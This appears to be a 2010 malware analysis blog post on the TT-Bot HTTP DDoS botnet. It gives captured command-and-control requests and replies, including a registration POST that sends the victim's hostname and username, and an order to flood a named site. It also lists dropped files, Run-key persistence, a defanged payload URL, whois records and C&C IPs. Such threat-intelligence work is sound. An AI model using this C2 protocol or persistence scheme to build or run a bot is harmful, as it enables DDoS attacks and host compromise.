TT-Bot DDoS Bot Analysis

We recently spotted this family in our malware zoo, another HTTP DDoS bot. This one’s identifying mark is the string “User-Agent: TT-Bot 1.0.0” in the client requests. We do not know if this is a kit, this one appears to be in limited use. We have not explored the server-side of it.

HTTP communications are two stage. The first stage is registration, where the bot gets its ID:

POST /register.php HTTP/1.1
Host: panel.ntpupdatedomain.com
User-Agent: TT-Bot 1.0.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
ccode=US&nat=1&os=5.1&owner=1&pcname=[Hostname]&username=[Username]&version=100

The server replies with an ID

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 18 Mar 2010 02:30:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: PHPSESSID=170b66d3e291e99e27f5441b2b5d935a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
28
<R><id>3961</id></R><I><c>45</c></I>
0

This ID is then used to get the command from the botnet by calling a server side script:

POST [REMOVED] HTTP/1.1
Host: panel.ntpupdatedomain.com
User-Agent: TT-Bot 1.0.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
id=3961

The server replies with a command, which can include new EXEs to download and launch or victims to DDoS:

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 18 Mar 2010 02:30:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: PHPSESSID=c88dea160e6476d2c312d1b2e27ca4d1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
68
<C><id>487</id><m>4</m><c>3</c><p0>www.dollaropoker.com</p0><p1>80</p1><p2>9</p2></C><I><c>60</c></I>
0

In this case the bot is told to DDoS (HTTP flood) www.dollaropoker.com.

Static analysis suggests that the code is written in MS VB 6. On the host the following filesystem modificaions occur:

drops and then deletes:
C:Documents and Settings[Username]Application Datactfmon.exe
drops and then deletes:
C:Documents and Settings[Username]Application Datasvchost.exe

It wouldn’t be a bot with some registry sets:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystemhost:
C:Documents and Settings[Username]Application Datactfmon.exe
HKEY_CURRENT_USERConsoleFL_Steam:
[REG_DWORD, value: 00000001]
HKEY_CURRENT_USERConsoleID:
[REG_DWORD, value: 000000E1]
HKEY_CURRENT_USERConsoleSECSERVER:
connect.tt-bot.com
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystemhost:
C:Documents and Settings[Username]Application Datactfmon.exe
HKEY_CURRENT_USERConsoleID:
[REG_DWORD, value: 00000022]
HKEY_CURRENT_USERConsoleSECSERVER:
p.tt-bot.com

Victims that we have seen DDoSed so far by this botnet:

    http://www.hydrodreams.ch/
    http:///www.dollaropoker.com/

The attacker has also told the bots (in the past) to downoad:

    hxxp://[REMOVED].funpic.de/v52.exe

Two of the domains associated with the botnet are privacy protected but appear questionable on inspection. The domain names ttbot.net, tt-bot.com and tt-bot.ru have been used (seen in registry keys):

[whois.PublicDomainRegistry.com]
Registration Service Provider:
LovingName.com - E-Gold Domain Registration
Accept Liberty Reserve, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Pecunix
.
Domain Name: TT-BOT.COM
.
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
.
Creation Date: 03-Oct-2009
Expiration Date: 03-Oct-2010
.
Domain servers in listed order:
ns2.2x4hosting.ru
ns1.2x4hosting.ru


Domain Name: ttbot.net
Registrar: Name.com LLC
.
Protected Domain Services Customer ID: NCR-1191739
.
Expiration Date: 2010-11-19 12:50:35
Creation Date: 2009-11-19 12:50:35
.
Name Servers:
NS1.NAME.COM
NS2.NAME.COM
NS3.NAME.COM
NS4.NAME.COM
.
REGISTRANT CONTACT INFO
Protected Domain Services - Customer ID: NCR-1191739
125 Rampart Way
Suite 300
Denver
CO
80230
US
Phone: +1.7202492374
Email Address: ttbot.net@protecteddomainservices.com


[whois.ripn.net]
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
.
domain: TT-BOT.RU
nserver: ns1.everydns.net.
nserver: ns2.everydns.net.
nserver: ns3.everydns.net.
nserver: ns4.everydns.net.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 4957564482
e-mail: mail@sunfighter.us
registrar: REGTIME-REG-RIPN
created: 2009.10.07
paid-till: 2010.10.07
source: TCI
.
Last updated on 2010.03.18 16:24:00 MSK/MSD

Known C&C servers for this botnet include connect.tt-bot.ru:

connect.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks

and panel.ntpupdatedomain.com

panel.ntpupdatedomain.com. 800 IN A 92.241.165.161
AS | IP | AS Name
41947 | 92.241.165.161 | WEBALTA-AS Wahome networks

Hostnames referenced in the bot’s registry include:

panel.tt-bot.ru is an alias for panel.vps100.tt-bot.ru.
panel.vps100.tt-bot.ru is an alias for vps100.ttbot.net.
vps100.ttbot.net has address 217.23.5.100


connect.tt-bot.com has address 92.241.169.250
p.tt-bot.com has address 92.241.169.250
.
AS | IP | AS Name
49981 | 217.23.5.100 | WORLDSTREAM WorldStream
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks

At this time this botnet is still live and issuing commands. We do not know how big this botnet is.

Comments are closed.